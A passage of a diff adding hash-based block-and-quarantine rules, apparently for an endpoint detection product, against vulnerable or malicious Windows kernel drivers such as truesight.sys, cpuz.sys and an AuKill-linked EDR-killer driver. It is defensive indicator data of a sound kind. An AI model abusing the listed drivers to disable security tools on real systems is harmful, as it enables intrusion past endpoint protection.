+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10d4da8b187122f5f1b1168fec9eda3fcd829d03a763953234230d4005611a7d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1eebb4d-5dde-58d5-899b-e8ee5afb4f63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823749Z",
+ "creation_date": "2026-03-23T11:45:31.823751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab540cd5d179dab65b26b519e0d42e785776349d2d1b847e8d2592c324d86249",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1f90a58-55a1-5699-bb20-0cfe472cbf6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982624Z",
+ "creation_date": "2026-03-23T11:45:29.982626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982632Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "baa89ffd5255e5c72112ed57937353ae48a050c9af423cbde6b380978ecc235c",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x86-withoutdbg.sys) [https://www.loldrivers.io/drivers/d9f2c3d6-160c-4eb3-8547-894fcf810342/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1fbdc3f-d254-5880-ba10-57334da1519f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158822Z",
+ "creation_date": "2026-03-23T11:45:31.158824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c58c16ad52d4f2ef42ee77c5e46aa315c8d412833b36ce54034a9a43c18f533",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1ff7cab-69da-53e3-bf34-f3f0fe1bd8a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144464Z",
+ "creation_date": "2026-03-23T11:45:31.144466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144471Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dadef39b191a5c4e4007a9720560d7e39b913b12556295fe11b3b0ca923a0e59",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2005d8f-7c42-5a45-b3bd-dac6934ff79b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832862Z",
+ "creation_date": "2026-03-23T11:45:30.832865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e30a49fce3e7db881497882c0a846b8f9834acd7443f895b1d40eaaad5f87d0b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2229195-9c0d-57cc-af75-7ce8a31c0d27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616922Z",
+ "creation_date": "2026-03-23T11:45:29.616923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "846cc7c9bf2eab3400e66481568a010fb0dfbac01416a99258a4baabf1e10d35",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2249eee-afff-58b6-a4a3-81a4acfc1203",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620238Z",
+ "creation_date": "2026-03-23T11:45:29.620240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2287136-c99e-52e3-8252-aa56fd089000",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477666Z",
+ "creation_date": "2026-03-23T11:45:30.477669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "828a18b16418c021b6c4aa8c6d54cef4e815efca0d48b9ff14822f9ccb69dff2",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d232e2e3-a3b0-5ea6-88c0-81ca9e6b3933",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620780Z",
+ "creation_date": "2026-03-23T11:45:29.620782Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620787Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d23ab5aa-cc19-5bc6-82b5-a074bc6c9317",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816283Z",
+ "creation_date": "2026-03-23T11:45:30.816285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a450ae0c9258ab0ae64f126f876b5feed63498db729ec61d06ed280e6c46f67",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d23dce60-e7fb-52fd-9d64-54b57653d087",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495437Z",
+ "creation_date": "2026-03-23T11:45:31.495439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca64e58831171214a5f49d3c2ae83c46669b022c4bbb4ab4f49ab7ac0fc5fd67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d25363fc-6497-5df1-b3ba-d6726bb6e4d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821982Z",
+ "creation_date": "2026-03-23T11:45:30.821984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb3176deae54472750747167287284c3cda5e14248ee10844305f322adcb81cd",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d25af5ed-5ae9-5018-8992-65353fe7079b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459737Z",
+ "creation_date": "2026-03-23T11:45:30.459740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6709a2d7925248fe172e9bc5495f45b9bb74060c43e1c58e671f0e6c434fd82b",
+ "comment": "Vulnerable Kernel Driver (aka test2.sys) [https://www.loldrivers.io/drivers/6356d7d9-3b82-4731-9d5f-cc9bc37558fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d26f861f-e07a-59a8-8371-721a13f168fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490226Z",
+ "creation_date": "2026-03-23T11:45:31.490228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0ac2c9641ea50b272f1a2cb08a88ead32edb2de195df812449289be84f8c62f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d27183e2-c2de-5b8e-81c7-9ec653d0e0c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976742Z",
+ "creation_date": "2026-03-23T11:45:29.976745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976754Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ef9e759f95645dbce0c49fe1e97838051a67c42995953778a651e3d8d017217",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d271e804-f286-57e3-89b6-59dada33c423",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159246Z",
+ "creation_date": "2026-03-23T11:45:31.159248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79e7bcc95f41c982a31e879826379c810340acdd5c8edc1493e06fd46e4fa893",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d27fc381-1eb0-5e9c-ad63-fbcdca0e6641",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823918Z",
+ "creation_date": "2026-03-23T11:45:31.823921Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c04912772a57ed2d216458e80775cba8ef389b777beee0556128230b7ad5ced0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d28a4c5e-ccad-55f2-8977-d0c535df5171",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981111Z",
+ "creation_date": "2026-03-23T11:45:29.981113Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981119Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa21e3d2bfb9fafddec0488852377fbb2dbdd6c066ca05bb5c4b6aa840fb7879",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d29454b7-f813-5cb0-9adc-0f7fc6cfe15f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833507Z",
+ "creation_date": "2026-03-23T11:45:30.833510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c007d8eb2f4a41275b9bc2850e37a40f699d2c94c4abce164ce236eaaf7ca7c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d29b0584-ef2d-5ba9-a2bb-717e94786590",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146168Z",
+ "creation_date": "2026-03-23T11:45:31.146170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "852e9260b9ee80f78ba23936fbb9e75eb7a841a9f9e486af65fcdac855884e64",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2a3877c-5c78-595d-b0da-8b4af75129d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472344Z",
+ "creation_date": "2026-03-23T11:45:30.472348Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8d6ce1c86cbd616bb821698037f60a41e129d282a8d6f1f5ecdd37a9688f585",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d2a72fd1-485c-59fb-aaf3-6118a99ec421",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493626Z",
+ "creation_date": "2026-03-23T11:45:31.493629Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c9dbc78d1953e9a177d2eac79f5a4174ea65a1889a99a356f3a6412ec3ba397",
